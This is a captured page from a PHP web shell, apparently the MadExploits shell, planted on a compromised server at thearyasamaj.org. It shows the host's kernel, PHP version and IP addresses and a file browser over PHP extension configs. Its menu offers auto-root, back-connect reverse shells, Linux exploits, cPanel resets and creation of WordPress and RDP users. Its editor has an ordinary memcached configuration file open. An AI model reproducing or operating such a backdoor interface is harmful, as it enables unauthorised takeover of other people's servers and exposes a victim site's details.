Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
opt /
remi /
php56 /
php.d /
[ HOME SHELL ]
Name
Size
Permission
Action
10-opcache.ini
3.78
KB
-rw-r--r--
20-bcmath.ini
53
B
-rw-r--r--
20-bz2.ini
47
B
-rw-r--r--
20-calendar.ini
57
B
-rw-r--r--
20-ctype.ini
51
B
-rw-r--r--
20-curl.ini
49
B
-rw-r--r--
20-dba.ini
47
B
-rw-r--r--
20-dom.ini
47
B
-rw-r--r--
20-enchant.ini
55
B
-rw-r--r--
20-exif.ini
49
B
-rw-r--r--
20-fileinfo.ini
57
B
-rw-r--r--
20-ftp.ini
47
B
-rw-r--r--
20-gd.ini
45
B
-rw-r--r--
20-gettext.ini
55
B
-rw-r--r--
20-gmp.ini
47
B
-rw-r--r--
20-iconv.ini
51
B
-rw-r--r--
20-imap.ini
49
B
-rw-r--r--
20-intl.ini
49
B
-rw-r--r--
20-ldap.ini
49
B
-rw-r--r--
20-mbstring.ini
57
B
-rw-r--r--
20-mcrypt.ini
53
B
-rw-r--r--
20-mysqlnd.ini
55
B
-rw-r--r--
20-odbc.ini
49
B
-rw-r--r--
20-pdo.ini
47
B
-rw-r--r--
20-pgsql.ini
51
B
-rw-r--r--
20-phar.ini
49
B
-rw-r--r--
20-posix.ini
51
B
-rw-r--r--
20-pspell.ini
53
B
-rw-r--r--
20-shmop.ini
51
B
-rw-r--r--
20-simplexml.ini
59
B
-rw-r--r--
20-soap.ini
49
B
-rw-r--r--
20-sockets.ini
55
B
-rw-r--r--
20-sqlite3.ini
55
B
-rw-r--r--
20-sysvmsg.ini
55
B
-rw-r--r--
20-sysvsem.ini
55
B
-rw-r--r--
20-sysvshm.ini
55
B
-rw-r--r--
20-tidy.ini
49
B
-rw-r--r--
20-tokenizer.ini
59
B
-rw-r--r--
20-xml.ini
47
B
-rw-r--r--
20-xmlwriter.ini
59
B
-rw-r--r--
20-xsl.ini
47
B
-rw-r--r--
30-mysql.ini
51
B
-rw-r--r--
30-mysqli.ini
53
B
-rw-r--r--
30-pdo_mysql.ini
59
B
-rw-r--r--
30-pdo_odbc.ini
57
B
-rw-r--r--
30-pdo_pgsql.ini
59
B
-rw-r--r--
30-pdo_sqlite.ini
61
B
-rw-r--r--
30-wddx.ini
49
B
-rw-r--r--
30-xmlreader.ini
59
B
-rw-r--r--
30-zip.ini
47
B
-rw-r--r--
40-apcu.ini
2.38
KB
-rw-r--r--
40-igbinary.ini
293
B
-rw-r--r--
40-imagick.ini
530
B
-rw-r--r--
40-json.ini
51
B
-rw-r--r--
40-memcache.ini
1.48
KB
-rw-r--r--
40-msgpack.ini
209
B
-rw-r--r--
40-ssh2.ini
49
B
-rw-r--r--
50-memcached.ini
4.49
KB
-rw-r--r--
opcache-default.blacklist
645
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 50-memcached.ini
; Enable memcached extension module extension=memcached.so ; ----- Options to use the memcached session handler ; RPM note : save_handler and save_path are defined ; for mod_php, in /etc/httpd/conf.d/php.conf ; for php-fpm, in /etc/opt/remi/php56/php-fpm.d/*conf ; Use memcache as a session handler ;session.save_handler=memcached ; Defines a comma separated list of server urls to use for session storage ;session.save_path="localhost:11211" ; ----- Configuration options ; http://php.net/manual/en/memcached.configuration.php [memcached] ; Use session locking ; valid values: On, Off ; the default is On memcached.sess_locking = On ; Session spin lock retry wait time in microseconds. ; Be carefull when setting this value. ; Valid values are integers, where 0 is interpreted as ; the default value. Negative values result in a reduces ; locking to a try lock. ; the default is 150000 memcached.sess_lock_wait = 150000 ; The maximum time, in seconds, to wait for a session lock ; before timing out. ; Setting to 0 results in default behavior, which is to ; use max_execution_time. memcached.sess_lock_max_wait = 0; ; The time, in seconds, before a lock should release itself. ; Setting to 0 results in the default behaviour, which is to ; use the memcached.sess_lock_max_wait setting. If that is ; also 0, max_execution_time will be used. memcached.sess_lock_expire = 0; ; memcached session key prefix ; valid values are strings less than 219 bytes long ; the default value is "memc.sess.key." memcached.sess_prefix = "memc.sess.key." ; memcached session consistent hash mode ; if set to On, consistent hashing (libketama) is used ; for session handling. ; When consistent hashing is used, one can add or remove cache ; node(s) without messing up too much with existing keys ; default is Off memcached.sess_consistent_hash = Off ; Allow failed memcached server to automatically be removed memcached.sess_remove_failed = 1 ; Write data to a number of additional memcached servers ; This is "poor man's HA" as libmemcached calls it. ; If this value is positive and sess_remove_failed is enabled ; when a memcached server fails the session will continue to be available ; from a replica. However, if the failed memcache server ; becomes available again it will read the session from there ; which could have old data or no data at all memcached.sess_number_of_replicas = 0 ; memcached session binary mode ; libmemcached replicas only work if binary mode is enabled memcached.sess_binary = Off ; memcached session replica read randomize memcached.sess_randomize_replica_read = Off ; memcached connect timeout value ; In non-blocking mode this changes the value of the timeout ; during socket connection in milliseconds. Specifying -1 means an infinite timeout. memcached.sess_connect_timeout = 1000 ; Session SASL username ; Both username and password need to be set for SASL to be enabled ; In addition to this memcached.use_sasl needs to be on memcached.sess_sasl_username = NULL ; Session SASL password memcached.sess_sasl_password = NULL ; Set the compression type ; valid values are: fastlz, zlib ; the default is fastlz memcached.compression_type = "fastlz" ; Compression factor ; Store compressed value only if the compression ; factor (saving) exceeds the set limit. ; ; store compressed if: ; plain_len > comp_len * factor ; ; the default value is 1.3 (23% space saving) memcached.compression_factor = "1.3" ; The compression threshold ; ; Do not compress serialized values below this threshold. ; the default is 2000 bytes memcached.compression_threshold = 2000 ; Set the default serializer for new memcached objects. ; valid values are: php, igbinary, json, json_array, msgpack ; ; json - standard php JSON encoding. This serializer ; is fast and compact but only works on UTF-8 ; encoded data and does not fully implement ; serializing. See the JSON extension. ; json_array - as json, but decodes into arrays ; php - the standard php serializer ; igbinary - a binary serializer ; msgpack - a cross-language binary serializer ; ; The default is igbinary if available, then msgpack if available, then php otherwise. memcached.serializer = "igbinary" ; Use SASL authentication for connections ; valid values: On, Off ; the default is Off memcached.use_sasl = Off ; The amount of retries for failed store commands. ; This mechanism allows transparent fail-over to secondary servers when ; set/increment/decrement/setMulti operations fail on the desired server in a multi-server ; environment. ; the default is 2 memcached.store_retry_count = 2
Close